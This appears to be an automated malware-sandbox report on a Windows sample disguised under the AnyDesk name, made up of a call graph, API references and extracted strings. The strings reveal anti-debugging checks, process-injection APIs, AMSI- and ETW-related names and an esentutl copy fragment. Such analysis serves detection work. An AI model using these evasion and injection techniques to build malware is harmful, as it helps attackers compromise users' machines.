2b246d4 call 2b247ec call 2b249a0 call 2b246d4 call 2b389d0 call 2b24860 call 2b249a0 call 2b246d4 call 2b247ec call 2b249a0 call 2b246d4 call 2b389d0 call 2b248ec 1817->1959 1960 2b43a3d-2b43aa8 call 2b24860 call 2b249a0 call 2b246d4 call 2b27e5c 1817->1960 1818->1817 1833 2b42346-2b423c1 call 2b32898 call 2b24860 call 2b249a0 call 2b246d4 call 2b247ec call 2b249a0 call 2b246d4 1821->1833 1874 2b423c6-2b423cd call 2b389d0 1833->1874 1878 2b423d2-2b4243d call 2b24860 call 2b249a0 call 2b246d4 call 2b247ec call 2b249a0 call 2b246d4 1874->1878 1902 2b42442-2b42466 call 2b389d0 call 2b2e3fc 1878->1902 1910 2b4246b-2b424d9 call 2b24860 call 2b249a0 call 2b246d4 call 2b247ec call 2b249a0 call 2b246d4 1902->1910 1934 2b424de-2b424e5 call 2b389d0 1910->1934 1938 2b424ea-2b42555 call 2b24860 call 2b249a0 call 2b246d4 call 2b247ec call 2b249a0 call 2b246d4 1934->1938 1966 2b4255a-2b42572 call 2b389d0 call 2b2e3fc 1938->1966 2455 2b47568-2b477e3 call 2b24860 call 2b249a0 call 2b246d4 call 2b247ec call 2b249a0 call 2b246d4 call 2b389d0 call 2b24860 call 2b249a0 call 2b246d4 call 2b247ec call 2b249a0 call 2b246d4 call 2b389d0 call 2b24860 call 2b249a0 call 2b246d4 call 2b247ec call 2b249a0 call 2b246d4 call 2b389d0 call 2b24860 call 2b249a0 call 2b246d4 call 2b247ec call 2b249a0 call 2b246d4 call 2b389d0 call 2b24860 call 2b249a0 call 2b246d4 call 2b247ec call 2b249a0 call 2b246d4 call 2b389d0 call 2b248ec 1959->2455 2456 2b45d88-2b45dcd call 2b24860 call 2b249a0 call 2b246d4 call 2b27e5c 1959->2456 1960->1959 1986 2b43aae-2b43e0a call 2b24860 call 2b249a0 call 2b246d4 call 2b247ec call 2b249a0 call 2b246d4 call 2b389d0 call 2b24860 call 2b249a0 call 2b246d4 call 2b247ec call 2b249a0 call 2b246d4 call 2b389d0 call 2b24860 call 2b249a0 call 2b246d4 call 2b247ec call 2b249a0 call 2b246d4 call 2b389d0 call 2b24860 call 2b249a0 call 2b246d4 call 2b247ec call 2b249a0 call 2b246d4 call 2b389d0 call 2b236d0 call 2b22f08 call 2b27990 call 2b24860 call 2b249a0 call 2b246d4 call 2b247ec call 2b249a0 call 2b246d4 call 2b389d0 call 2b24860 call 2b249a0 call 2b246d4 call 2b23700 1960->1986 1976 2b42577-2b425e5 call 2b24860 call 2b249a0 call 2b246d4 call 2b247ec call 2b249a0 call 2b246d4 1966->1976 2014 2b425ea-2b425f1 call 2b389d0 1976->2014 2018 2b425f6-2b42661 call 2b24860 call 2b249a0 call 2b246d4 call 2b247ec call 2b249a0 call 2b246d4 2014->2018 2055 2b42666-2b42683 call 2b389d0 call 2b2e3fc 2018->2055 2066 2b42688-2b42706 call 2b317e8 call 2b24860 call 2b249a0 call 2b246d4 call 2b247ec call 2b249a0 call 2b246d4 2055->2066 2110 2b4270b-2b42712 call 2b389d0 2066->2110 2114 2b42717-2b42782 call 2b24860 call 2b249a0 call 2b246d4 call 2b247ec call 2b249a0 call 2b246d4 2110->2114 2151 2b42787-2b427b4 call 2b389d0 CoUninitialize call 2b24860 2114->2151 2162 2b427b9-2b42803 call 2b249a0 call 2b246d4 call 2b247ec call 2b249a0 call 2b246d4 2151->2162 2191 2b42808-2b4280f call 2b389d0 2162->2191 2198 2b42814-2b4287f call 2b24860 call 2b249a0 call 2b246d4 call 2b247ec call 2b249a0 call 2b246d4 2191->2198 2233 2b42884-2b4288b call 2b389d0 2198->2233 2239 2b42890-2b428a3 2233->2239 2242 2b428a5-2b428a8 2239->2242 2243 2b428aa-2b428af 2239->2243 2242->2243 2243->1619 2246 2b428b5-2b42ac0 call 2b24860 call 2b249a0 call 2b246d4 call 2b247ec call 2b249a0 call 2b246d4 call 2b389d0 call 2b24860 call 2b249a0 call 2b246d4 call 2b247ec call 2b249a0 call 2b246d4 call 2b389d0 call 2b3f690 call 2b24530 call 2b24860 call 2b249a0 call 2b246d4 call 2b247ec call 2b249a0 call 2b246d4 call 2b389d0 call 2b24860 call 2b249a0 call 2b246d4 call 2b247ec call 2b249a0 call 2b246d4 call 2b389d0 2243->2246 2246->1619 2602 2b48318-2b48517 call 2b24860 call 2b249a0 call 2b246d4 call 2b247ec call 2b249a0 call 2b246d4 call 2b389d0 call 2b24860 call 2b249a0 call 2b246d4 call 2b247ec call 2b249a0 call 2b246d4 call 2b389d0 call 2b24860 call 2b249a0 call 2b246d4 call 2b247ec call 2b249a0 call 2b246d4 call 2b389d0 call 2b24860 call 2b249a0 call 2b246d4 call 2b247ec call 2b249a0 call 2b246d4 call 2b389d0 call 2b248ec 2455->2602 2603 2b477e9-2b47e3b call 2b24860 call 2b249a0 call 2b246d4 call 2b247ec call 2b249a0 call 2b246d4 call 2b389d0 call 2b24860 call 2b249a0 call 2b246d4 call 2b247ec call 2b249a0 call 2b246d4 call 2b389d0 call 2b24860 call 2b249a0 call 2b246d4 call 2b247ec call 2b249a0 call 2b246d4 call 2b389d0 call 2b247ec call 2b249a0 call 2b385bc call 2b24860 call 2b249a0 call 2b246d4 call 2b247ec call 2b249a0 call 2b246d4 call 2b389d0 call 2b24860 call 2b249a0 call 2b246d4 call 2b247ec call 2b249a0 call 2b246d4 call 2b389d0 call 2b24860 call 2b249a0 call 2b246d4 call 2b247ec call 2b249a0 call 2b246d4 call 2b389d0 call 2b249a0 call 2b246d4 call 2b3adf8 call 2b24860 call 2b249a0 call 2b246d4 call 2b247ec call 2b249a0 call 2b246d4 call 2b389d0 call 2b24860 call 2b249a0 call 2b246d4 call 2b247ec call 2b249a0 call 2b246d4 call 2b389d0 call 2b24860 call 2b249a0 call 2b246d4 call 2b247ec call 2b249a0 call 2b246d4 call 2b389d0 call 2b236d0 call 2b24860 call 2b249a0 call 2b246d4 call 2b247ec call 2b249a0 call 2b246d4 call 2b389d0 call 2b24860 call 2b249a0 call 2b246d4 call 2b247ec call 2b249a0 call 2b246d4 call 2b389d0 call 2b24860 call 2b249a0 call 2b246d4 call 2b247ec call 2b249a0 call 2b246d4 call 2b389d0 2455->2603 2456->2455 2473 2b45dd3-2b466e5 call 2b24860 call 2b249a0 call 2b246d4 call 2b247ec call 2b249a0 call 2b246d4 call 2b389d0 call 2b24860 call 2b249a0 call 2b246d4 call 2b247ec call 2b249a0 call 2b246d4 call 2b389d0 call 2b24860 call 2b249a0 call 2b246d4 call 2b247ec call 2b249a0 call 2b246d4 call 2b389d0 call 2b24860 call 2b249a0 call 2b246d4 call 2b24860 call 2b249a0 call 2b246d4 call 2b247ec call 2b249a0 call 2b246d4 call 2b389d0 call 2b24860 call 2b249a0 call 2b246d4 call 2b247ec call 2b249a0 call 2b246d4 call 2b389d0 call 2b24860 call 2b249a0 call 2b246d4 call 2b247ec call 2b249a0 call 2b246d4 call 2b389d0 call 2b24860 call 2b249a0 call 2b246d4 call 2b247ec call 2b249a0 call 2b246d4 call 2b389d0 call 2b24860 call 2b249a0 call 2b246d4 call 2b24860 call 2b249a0 call 2b246d4 call 2b247ec call 2b249a0 call 2b246d4 call 2b389d0 call 2b24860 call 2b249a0 call 2b246d4 call 2b247ec call 2b249a0 call 2b246d4 call 2b389d0 call 2b24860 call 2b249a0 call 2b246d4 call 2b247ec call 2b249a0 call 2b246d4 call 2b389d0 call 2b24860 call 2b249a0 call 2b246d4 call 2b247ec call 2b249a0 call 2b246d4 call 2b389d0 call 2b24860 call 2b249a0 call 2b246d4 call 2b247ec call 2b249a0 call 2b246d4 call 2b389d0 call 2b24860 call 2b249a0 call 2b246d4 call 2b247ec call 2b249a0 call 2b246d4 call 2b389d0 call 2b24860 call 2b249a0 call 2b385bc call 2b24860 call 2b249a0 call 2b246d4 call 2b247ec call 2b249a0 call 2b246d4 call 2b389d0 call 2b24860 call 2b249a0 call 2b246d4 call 2b247ec call 2b249a0 call 2b246d4 call 2b389d0 call 2b24860 call 2b249a0 call 2b246d4 call 2b247ec call 2b249a0 call 2b246d4 call 2b389d0 call 2b24860 call 2b249a0 call 2b246d4 call 2b247ec call 2b249a0 call 2b246d4 call 2b389d0 call 2b248ec 2456->2473 3435 2b46949-2b4706c call 2b24860 call 2b249a0 call 2b246d4 call 2b247ec call 2b249a0 call 2b246d4 call 2b389d0 call 2b24860 call 2b249a0 call 2b246d4 call 2b247ec call 2b249a0 call 2b246d4 call 2b389d0 call 2b24860 call 2b249a0 call 2b246d4 call 2b247ec call 2b249a0 call 2b246d4 call 2b389d0 call 2b24860 call 2b249a0 call 2b246d4 call 2b247ec call 2b249a0 call 2b246d4 call 2b389d0 call 2b24860 call 2b249a0 call 2b246d4 call 2b247ec call 2b249a0 call 2b246d4 call 2b389d0 call 2b24860 call 2b249a0 call 2b246d4 call 2b247ec call 2b249a0 call 2b246d4 call 2b389d0 call 2b24860 call 2b249a0 call 2b246d4 call 2b247ec call 2b249a0 call 2b246d4 call 2b389d0 call 2b236d0 call 2b24860 call 2b249a0 call 2b246d4 call 2b247ec call 2b249a0 call 2b246d4 call 2b389d0 call 2b24860 call 2b22f08 call 2b27990 call 2b247ec call 2b24860 call 2b249a0 call 2b246d4 call 2b247ec call 2b249a0 call 2b246d4 call 2b389d0 call 2b24860 call 2b249a0 call 2b246d4 call 2b247ec call 2b249a0 call 2b246d4 call 2b389d0 call 2b22f08 call 2b27990 call 2b247ec call 2b24860 call 2b249a0 call 2b246d4 call 2b247ec call 2b249a0 call 2b246d4 call 2b389d0 call 2b24860 call 2b249a0 call 2b246d4 call 2b247ec call 2b249a0 call 2b246d4 call 2b389d0 call 2b24860 call 2b249a0 call 2b246d4 call 2b23700 2473->3435 3436 2b466eb-2b46944 call 2b24860 call 2b249a0 call 2b246d4 call 2b247ec call 2b249a0 call 2b246d4 call 2b389d0 call 2b24860 call 2b249a0 call 2b246d4 call 2b247ec call 2b249a0 call 2b246d4 call 2b389d0 call 2b24860 call 2b249a0 call 2b246d4 call 2b247ec call 2b249a0 call 2b246d4 call 2b389d0 call 2b24860 call 2b249a0 call 2b246d4 call 2b247ec call 2b249a0 call 2b246d4 call 2b389d0 call 2b24860 call 2b249a0 call 2b24d74 call 2b24de0 call 2b24764 call 2b3dc8c 2473->3436 2780 2b493a1-2b49524 call 2b24860 call 2b249a0 call 2b246d4 call 2b247ec call 2b249a0 call 2b246d4 call 2b389d0 call 2b24860 call 2b249a0 call 2b246d4 call 2b247ec call 2b249a0 call 2b246d4 call 2b389d0 call 2b24860 call 2b249a0 call 2b246d4 call 2b247ec call 2b249a0 call 2b246d4 call 2b389d0 call 2b248ec 2602->2780 2781 2b4851d-2b486f0 call 2b24860 call 2b249a0 call 2b246d4 call 2b247ec call 2b249a0 call 2b246d4 call 2b389d0 call 2b24860 call 2b249a0 call 2b246d4 call 2b247ec call 2b249a0 call 2b246d4 call 2b389d0 call 2b24860 call 2b249a0 call 2b246d4 call 2b247ec call 2b249a0 call 2b246d4 call 2b389d0 call 2b247ec call 2b249a0 call 2b24d74 call 2b24df0 CreateProcessAsUserW 2602->2781 3369 2b47e42-2b48104 call 2b35aec call 2b24bcc call 2b24860 call 2b249a0 call 2b246d4 call 2b247ec call 2b249a0 call 2b246d4 call 2b389d0 call 2b249f8 call 2b37e50 call 2b24860 call 2b249a0 call 2b246d4 call 2b247ec call 2b249a0 call 2b246d4 call 2b389d0 call 2b24860 call 2b249a0 call 2b246d4 call 2b247ec call 2b249a0 call 2b246d4 call 2b389d0 call 2b24860 call 2b249a0 call 2b246d4 call 2b247ec call 2b249a0 call 2b246d4 call 2b389d0 call 2b24860 call 2b249a0 call 2b246d4 call 2b247ec call 2b249a0 call 2b246d4 call 2b389d0 call 2b3b118 2603->3369 3370 2b47e3d-2b47e40 2603->3370 2960 2b49cf5-2b4b2fa call 2b24860 call 2b249a0 call 2b246d4 call 2b247ec call 2b249a0 call 2b246d4 call 2b389d0 call 2b24860 call 2b249a0 call 2b246d4 call 2b247ec call 2b249a0 call 2b246d4 call 2b389d0 call 2b24860 call 2b249a0 call 2b246d4 call 2b247ec call 2b249a0 call 2b246d4 call 2b389d0 call 2b246d4 * 2 call 2b389d0 call 2b246d4 * 2 call 2b389d0 call 2b246d4 * 2 call 2b389d0 call 2b246d4 * 2 call 2b389d0 call 2b24860 call 2b249a0 call 2b246d4 call 2b247ec call 2b249a0 call 2b246d4 call 2b389d0 call 2b24860 call 2b249a0 call 2b246d4 call 2b247ec call 2b249a0 call 2b246d4 call 2b389d0 call 2b24860 call 2b249a0 call 2b246d4 call 2b247ec call 2b249a0 call 2b246d4 call 2b389d0 call 2b246d4 * 2 call 2b389d0 call 2b246d4 * 2 call 2b389d0 call 2b246d4 * 2 call 2b389d0 call 2b246d4 * 2 call 2b389d0 call 2b246d4 * 2 call 2b389d0 call 2b24860 call 2b249a0 call 2b246d4 call 2b247ec call 2b249a0 call 2b246d4 call 2b389d0 call 2b24860 call 2b249a0 call 2b246d4 call 2b247ec call 2b249a0 call 2b246d4 call 2b389d0 call 2b246d4 * 2 call 2b389d0 call 2b24860 call 2b249a0 call 2b246d4 call 2b247ec call 2b249a0 call 2b246d4 call 2b389d0 call 2b24860 call 2b249a0 call 2b246d4 call 2b247ec call 2b249a0 call 2b246d4 call 2b389d0 call 2b24860 call 2b249a0 call 2b246d4 call 2b247ec call 2b249a0 call 2b246d4 call 2b389d0 call 2b246d4 * 2 call 2b389d0 call 2b246d4 * 2 call 2b389d0 call 2b246d4 * 2 call 2b389d0 call 2b246d4 * 2 call 2b389d0 call 2b24860 call 2b249a0 call 2b246d4 call 2b247ec call 2b249a0 call 2b246d4 call 2b389d0 call 2b24860 call 2b249a0 call 2b246d4 call 2b247ec call 2b249a0 call 2b246d4 call 2b389d0 call 2b246d4 * 2 call 2b389d0 call 2b246d4 * 2 call 2b389d0 call 2b246d4 * 2 call 2b389d0 call 2b246d4 * 2 call 2b389d0 call 2b246d4 * 2 call 2b389d0 call 2b24860 call 2b249a0 call 2b246d4 call 2b247ec call 2b249a0 call 2b246d4 call 2b389d0 call 2b24860 call 2b249a0 call 2b246d4 call 2b247ec call 2b249a0 call 2b246d4 call 2b389d0 call 2b24860 call 2b249a0 call 2b246d4 call 2b247ec call 2b249a0 call 2b246d4 call 2b389d0 call 2b24860 call 2b249a0 call 2b246d4 call 2b247ec call 2b249a0 call 2b246d4 call 2b389d0 call 2b24860 call 2b249a0 call 2b246d4 call 2b247ec call 2b249a0 call 2b246d4 call 2b389d0 * 16 call 2b24860 call 2b249a0 call 2b246d4 call 2b247ec call 2b249a0 call 2b246d4 call 2b389d0 call 2b246d4 * 2 call 2b389d0 call 2b246d4 * 2 call 2b389d0 call 2b246d4 * 2 call 2b389d0 call 2b246d4 * 2 call 2b389d0 call 2b246d4 * 2 call 2b389d0 call 2b246d4 * 2 call 2b389d0 call 2b246d4 * 2 call 2b389d0 call 2b24860 call 2b249a0 call 2b246d4 call 2b247ec call 2b249a0 call 2b246d4 call 2b389d0 call 2b24860 call 2b249a0 call 2b246d4 call 2b247ec call 2b249a0 call 2b246d4 call 2b389d0 call 2b24860 call 2b249a0 call 2b246d4 call 2b247ec call 2b249a0 call 2b246d4 call 2b389d0 call 2b246d4 * 2 call 2b389d0 call 2b246d4 * 2 call 2b389d0 call 2b246d4 * 2 call 2b389d0 call 2b246d4 * 2 call 2b389d0 call 2b246d4 * 2 call 2b389d0 call 2b246d4 * 2 call 2b389d0 call 2b246d4 * 2 call 2b389d0 call 2b246d4 * 2 call 2b389d0 call 2b246d4 * 2 call 2b389d0 call 2b246d4 * 2 call 2b389d0 call 2b246d4 * 2 call 2b389d0 call 2b246d4 * 2 call 2b389d0 call 2b246d4 * 2 call 2b389d0 call 2b246d4 * 2 call 2b389d0 call 2b246d4 * 2 call 2b389d0 call 2b246d4 * 2 call 2b389d0 call 2b246d4 * 2 call 2b389d0 call 2b246d4 * 2 call 2b389d0 call 2b246d4 * 2 call 2b389d0 call 2b37c10 call 2b38338 call 2b24860 call 2b249a0 call 2b246d4 call 2b247ec call 2b249a0 call 2b246d4 call 2b389d0 call 2b24860 call 2b249a0 call 2b246d4 call 2b247ec call 2b249a0 call 2b246d4 call 2b389d0 call 2b24860 call 2b249a0 call 2b246d4 call 2b247ec call 2b249a0 call 2b246d4 call 2b389d0 ExitProcess 2780->2960 2961 2b4952a-2b49539 call 2b248ec 2780->2961 2989 2b486f2-2b48769 call 2b24860 call 2b249a0 call 2b246d4 call 2b247ec call 2b249a0 call 2b246d4 call 2b389d0 2781->2989 2990 2b4876e-2b48879 call 2b24860 call 2b249a0 call 2b246d4 call 2b247ec call 2b249a0 call 2b246d4 call 2b389d0 call 2b24860 call 2b249a0 call 2b246d4 call 2b247ec call 2b249a0 call 2b246d4 call 2b389d0 2781->2990 2961->2960 2975 2b4953f-2b49812 call 2b24860 call 2b249a0 call 2b246d4 call 2b247ec call 2b249a0 call 2b246d4 call 2b389d0 call 2b24860 call 2b249a0 call 2b246d4 call 2b247ec call 2b249a0 call 2b246d4 call 2b389d0 call 2b24860 call 2b249a0 call 2b246d4 call 2b247ec call 2b249a0 call 2b246d4 call 2b389d0 call 2b3f094 call 2b24860 call 2b249a0 call 2b246d4 call 2b24860 call 2b249a0 call 2b246d4 call 2b247ec call 2b249a0 call 2b246d4 call 2b389d0 call 2b24860 call 2b249a0 call 2b246d4 call 2b247ec call 2b249a0 call 2b246d4 call 2b389d0 call 2b27e5c 2961->2975 3395 2b49aef-2b49cf0 call 2b24860 call 2b249a0 call 2b246d4 call 2b247ec call 2b249a0 call 2b246d4 call 2b389d0 call 2b24860 call 2b249a0 call 2b246d4 call 2b247ec call 2b249a0 call 2b246d4 call 2b389d0 call 2b24860 call 2b249a0 call 2b246d4 call 2b247ec call 2b249a0 call 2b246d4 call 2b389d0 call 2b24860 call 2b249a0 call 2b246d4 call 2b247ec call 2b249a0 call 2b246d4 call 2b389d0 call 2b249f8 call 2b38d70 2975->3395 3396 2b49818-2b49aea call 2b24860 call 2b249a0 call 2b246d4 call 2b247ec call 2b249a0 call 2b246d4 call 2b389d0 call 2b24860 call 2b249a0 call 2b246d4 call 2b247ec call 2b249a0 call 2b246d4 call 2b389d0 call 2b24860 call 2b249a0 call 2b246d4 call 2b247ec call 2b249a0 call 2b246d4 call 2b389d0 call 2b3e358 call 2b24530 call 2b24860 call 2b249a0 call 2b246d4 call 2b247ec call 2b249a0 call 2b246d4 call 2b389d0 call 2b24860 call 2b249a0 call 2b246d4 call 2b247ec call 2b249a0 call 2b246d4 call 2b389d0 call 2b24de0 * 2 call 2b24764 call 2b3dc8c 2975->3396 2989->2990 3151 2b48880-2b48ba0 call 2b249f8 call 2b3de50 call 2b24860 call 2b249a0 call 2b246d4 call 2b247ec call 2b249a0 call 2b246d4 call 2b389d0 call 2b24860 call 2b249a0 call 2b246d4 call 2b247ec call 2b249a0 call 2b246d4 call 2b389d0 call 2b24860 call 2b249a0 call 2b246d4 call 2b247ec call 2b249a0 call 2b246d4 call 2b389d0 call 2b3d164 call 2b24860 call 2b249a0 call 2b246d4 call 2b247ec call 2b249a0 call 2b246d4 call 2b389d0 call 2b24860 call 2b249a0 call 2b246d4 call 2b247ec call 2b249a0 call 2b246d4 call 2b389d0 call 2b24860 call 2b249a0 call 2b246d4 call 2b247ec call 2b249a0 call 2b246d4 call 2b389d0 2990->3151 3152 2b4887b-2b4887e 2990->3152 3685 2b48ba2-2b48bb4 call 2b38730 3151->3685 3686 2b48bb9-2b4939c call 2b24860 call 2b249a0 call 2b246d4 call 2b247ec call 2b249a0 call 2b246d4 call 2b389d0 call 2b24860 call 2b249a0 call 2b246d4 call 2b247ec call 2b249a0 call 2b246d4 call 2b389d0 call 2b24860 call 2b249a0 call 2b246d4 call 2b247ec call 2b249a0 call 2b246d4 call 2b389d0 ResumeThread call 2b24860 call 2b249a0 call 2b246d4 call 2b247ec call 2b249a0 call 2b246d4 call 2b389d0 call 2b24860 call 2b249a0 call 2b246d4 call 2b247ec call 2b249a0 call 2b246d4 call 2b389d0 call 2b24860 call 2b249a0 call 2b246d4 call 2b247ec call 2b249a0 call 2b246d4 call 2b389d0 CloseHandle call 2b24860 call 2b249a0 call 2b246d4 call 2b247ec call 2b249a0 call 2b246d4 call 2b389d0 call 2b24860 call 2b249a0 call 2b246d4 call 2b247ec call 2b249a0 call 2b246d4 call 2b389d0 call 2b24860 call 2b249a0 call 2b246d4 call 2b247ec call 2b249a0 call 2b246d4 call 2b389d0 call 2b24860 call 2b249a0 call 2b246d4 call 2b247ec call 2b249a0 call 2b246d4 call 2b389d0 call 2b24860 call 2b249a0 call 2b246d4 call 2b247ec call 2b249a0 call 2b246d4 call 2b389d0 call 2b24860 call 2b249a0 call 2b246d4 call 2b247ec call 2b249a0 call 2b246d4 call 2b389d0 call 2b24860 call 2b249a0 call 2b246d4 call 2b247ec call 2b249a0 call 2b246d4 call 2b389d0 call 2b38080 call 2b3894c * 6 CloseHandle call 2b24860 call 2b249a0 call 2b246d4 call 2b247ec call 2b249a0 call 2b246d4 call 2b389d0 call 2b24860 call 2b249a0 call 2b246d4 call 2b247ec call 2b249a0 call 2b246d4 call 2b389d0 3151->3686 3152->3151 3918 2b48109-2b48120 call 2b23700 3369->3918 3370->3369 3395->2960 3396->3395 3436->3435 3685->3686 3686->2780
            APIs
            • InetIsOffline.URL(00000000,00000000,02B4B784,?,?,?,00000000,00000000), ref: 02B3F801
              • Part of subcall function 02B389D0: FreeLibrary.KERNEL32(74F60000,00000000,00000000,00000000,00000000,02BA738C,Function_0000662C,00000004,02BA739C,02BA738C,05F5E103,00000040,02BA73A0,74F60000,00000000,00000000), ref: 02B38AAA
              • Part of subcall function 02B3F6E8: GetModuleHandleW.KERNEL32(KernelBase,?,02B3FAEB,UacInitialize,02BA7380,02B4B7B8,OpenSession,02BA7380,02B4B7B8,ScanBuffer,02BA7380,02B4B7B8,ScanString,02BA7380,02B4B7B8,Initialize), ref: 02B3F6EE
              • Part of subcall function 02B3F6E8: GetProcAddress.KERNEL32(00000000,IsDebuggerPresent), ref: 02B3F700
              • Part of subcall function 02B3F744: GetModuleHandleW.KERNEL32(KernelBase), ref: 02B3F754
              • Part of subcall function 02B3F744: GetProcAddress.KERNEL32(00000000,CheckRemoteDebuggerPresent), ref: 02B3F766
              • Part of subcall function 02B3F744: CheckRemoteDebuggerPresent.KERNEL32(FFFFFFFF,?,00000000,CheckRemoteDebuggerPresent,KernelBase), ref: 02B3F77D
              • Part of subcall function 02B27E5C: GetFileAttributesA.KERNEL32(00000000,?,02B4041F,ScanString,02BA7380,02B4B7B8,OpenSession,02BA7380,02B4B7B8,ScanString,02BA7380,02B4B7B8,UacScan,02BA7380,02B4B7B8,UacInitialize), ref: 02B27E67
              • Part of subcall function 02B2C364: GetModuleFileNameA.KERNEL32(00000000,?,00000105,02C9B8B8,?,02B40751,ScanBuffer,02BA7380,02B4B7B8,OpenSession,02BA7380,02B4B7B8,ScanBuffer,02BA7380,02B4B7B8,OpenSession), ref: 02B2C37B
              • Part of subcall function 02B3DD70: RtlDosPathNameToNtPathName_U.N(00000000,?,00000000,00000000,00000000,02B3DE40), ref: 02B3DDAB
              • Part of subcall function 02B3DD70: NtOpenFile.N(?,00100001,?,?,00000001,00000020,00000000,?,00000000,00000000,00000000,02B3DE40), ref: 02B3DDDB
              • Part of subcall function 02B3DD70: NtQueryInformationFile.N(?,?,?,00000018,00000005,?,00100001,?,?,00000001,00000020,00000000,?,00000000,00000000,00000000), ref: 02B3DDF0
              • Part of subcall function 02B3DD70: NtReadFile.N(?,00000000,00000000,00000000,?,00000000,?,00000000,00000000,?,?,?,00000018,00000005,?,00100001), ref: 02B3DE1C
              • Part of subcall function 02B3DD70: NtClose.N(?,?,00000000,00000000,00000000,?,00000000,?,00000000,00000000,?,?,?,00000018,00000005,?), ref: 02B3DE25
              • Part of subcall function 02B27E80: GetFileAttributesA.KERNEL32(00000000,?,02B4356F,ScanString,02BA7380,02B4B7B8,OpenSession,02BA7380,02B4B7B8,ScanBuffer,02BA7380,02B4B7B8,OpenSession,02BA7380,02B4B7B8,Initialize), ref: 02B27E8B
              • Part of subcall function 02B28048: CreateDirectoryA.KERNEL32(00000000,00000000,?,02B4370D,OpenSession,02BA7380,02B4B7B8,ScanString,02BA7380,02B4B7B8,Initialize,02BA7380,02B4B7B8,ScanString,02BA7380,02B4B7B8), ref: 02B28055
            Strings
            Memory Dump Source
            • Source File: 00000000.00000002.3368479977.0000000002B21000.00000020.00001000.00020000.00000000.sdmp, Offset: 02B20000, based on PE: true
            • Associated: 00000000.00000002.3368459409.0000000002B20000.00000002.00001000.00020000.00000000.sdmpDownload File
            • Associated: 00000000.00000002.3368560990.0000000002B4E000.00000004.00001000.00020000.00000000.sdmpDownload File
            • Associated: 00000000.00000002.3368717343.0000000002BA7000.00000040.00001000.00020000.00000000.sdmpDownload File
            • Associated: 00000000.00000002.3368717343.0000000002C9C000.00000040.00001000.00020000.00000000.sdmpDownload File
            • Associated: 00000000.00000002.3368717343.0000000002C9E000.00000040.00001000.00020000.00000000.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_2b20000_AnyDesk.jbxd
            Similarity
            • API ID: File$Module$AddressAttributesHandleNamePathProc$CheckCloseCreateDebuggerDirectoryFreeInetInformationLibraryName_OfflineOpenPresentQueryReadRemote
            • String ID: /d $ /o$.url$Advapi$BCryptQueryProviderRegistration$BCryptRegisterProvider$BCryptVerifySignature$C:\Users\Public\$C:\Windows\System32\$C:\\Users\\Public\\Libraries\\$C:\\Windows\\System32\\esentutl.exe /y $CreateProcessA$CreateProcessAsUserA$CreateProcessAsUserW$CreateProcessW$CreateProcessWithLogonW$CryptSIPGetInfo$CryptSIPGetSignedDataMsg$CryptSIPVerifyIndirectData$D2^Tyj}~TVrgoij[Dkcxn}dmu$DllGetActivationFactory$DllGetClassObject$DllRegisterServer$DlpCheckIsCloudSyncApp$DlpGetArchiveFileTraceInfo$DlpGetWebSiteAccess$DlpNotifyPreDragDrop$EnumProcessModules$EnumServicesStatusA$EnumServicesStatusExA$EnumServicesStatusExW$EnumServicesStatusW$EtwEventWrite$EtwEventWriteEx$FindCertsByIssuer$FlushInstructionCache$GET$GZmMS1j$GetProcessMemoryInfo$GetProxyDllInfo$HotKey=$I_QueryTagInformation$IconIndex=$Initialize$Kernel32$LdrGetProcedureAddress$LdrLoadDll$MZP$MiniDumpReadDumpStream$MiniDumpWriteDump$NtAccessCheck$NtAlertResumeThread$NtCreateSection$NtDeviceIoControlFile$NtGetWriteWatch$NtMapViewOfSection$NtOpenFile$NtOpenObjectAuditAlarm$NtOpenProcess$NtOpenSection$NtQueryDirectoryFile$NtQueryInformationThread$NtQuerySecurityObject$NtQuerySystemInformation$NtQueryVirtualMemory$NtReadVirtualMemory$NtSetSecurityObject$NtWaitForSingleObject$NtWriteVirtualMemory$Ntdll$OpenProcess$OpenSession$RetailTracerEnable$RtlAllocateHeap$RtlCreateQueryDebugBuffer$RtlQueryProcessDebugInformation$SLGatherMigrationBlob$SLGetEncryptedPIDEx$SLGetGenuineInformation$SLGetSLIDList$SLIsGenuineLocalEx$SLLoadApplicationPolicies$ScanBuffer$ScanString$SetUnhandledExceptionFilter$SxTracerGetThreadContextDebug$TrustOpenStores$URL=file:"$UacInitialize$UacScan$UacUninitialize$VirtualAlloc$VirtualAllocEx$VirtualProtect$WinHttp.WinHttpRequest.5.1$WintrustAddActionID$WriteVirtualMemory$[InternetShortcut]$acS$advapi32$bcrypt$can$dbgcore$endpointdlp$http$ieproxy$kernel32$mssip32$ntdll$psapi$psapi$smartscreenps$spp$sppc$sppwmi$tquery$wintrust
            • API String ID: 297057983-2644593349
            • Opcode ID: 3e7696bfdedb58693afab4776f432a15a48ca598833a72d60f0da1dccae6369b
            • Instruction ID: 0b06f27b408b9eff46295fb3a7cfe9cdcd163596bbe3d8e5a3744bd1a34a9f50
            • Opcode Fuzzy Hash: 3e7696bfdedb58693afab4776f432a15a48ca598833a72d60f0da1dccae6369b
            • Instruction Fuzzy Hash: B614F935A0426C8FDB11EB64DD80ACE73BAFF89304F5041E5A50DABA14DE30EE999F51

            Control-flow Graph

            • Executed
            • Not Executed
            control_flow_graph 4730 2b25acc-2b25b0d GetModuleFileNameA RegOpenKeyExA 4731 2b25b4f-2b25b92 call 2b25908 RegQueryValueExA 4730->4731 4732 2b25b0f-2b25b2b RegOpenKeyExA 4730->4732 4739 2b25bb6-2b25bd0 RegCloseKey 4731->4739 4740 2b25b94-2b25bb0 RegQueryValueExA 4731->4740 4732->4731 4733 2b25b2d-2b25b49 RegOpenKeyExA 4732->4733 4733->4731 4735 2b25bd8-2b25c09 lstrcpynA GetThreadLocale GetLocaleInfoA 4733->4735 4737 2b25cf2-2b25cf9 4735->4737 4738 2b25c0f-2b25c13 4735->4738 4741 2b25c15-2b25c19 4738->4741 4742 2b25c1f-2b25c35 lstrlenA 4738->4742 4740->4739 4743 2b25bb2 4740->4743 4741->4737 4741->4742 4745 2b25c38-2b25c3b 4742->4745 4743->4739 4746 2b25c47-2b25c4f 4745->4746 4747 2b25c3d-2b25c45 4745->4747 4746->4737 4749 2b25c55-2b25c5a 4746->4749 4747->4746 4748 2b25c37 4747->4748 4748->4745 4750 2b25c84-2b25c86 4749->4750 4751 2b25c5c-2b25c82 lstrcpynA LoadLibraryExA 4749->4751 4750->4737 4752 2b25c88-2b25c8c 4750->4752 4751->4750 4752->4737 4753 2b25c8e-2b25cbe lstrcpynA LoadLibraryExA 4752->4753 4753->4737 4754 2b25cc0-2b25cf0 lstrcpynA LoadLibraryExA 4753->4754 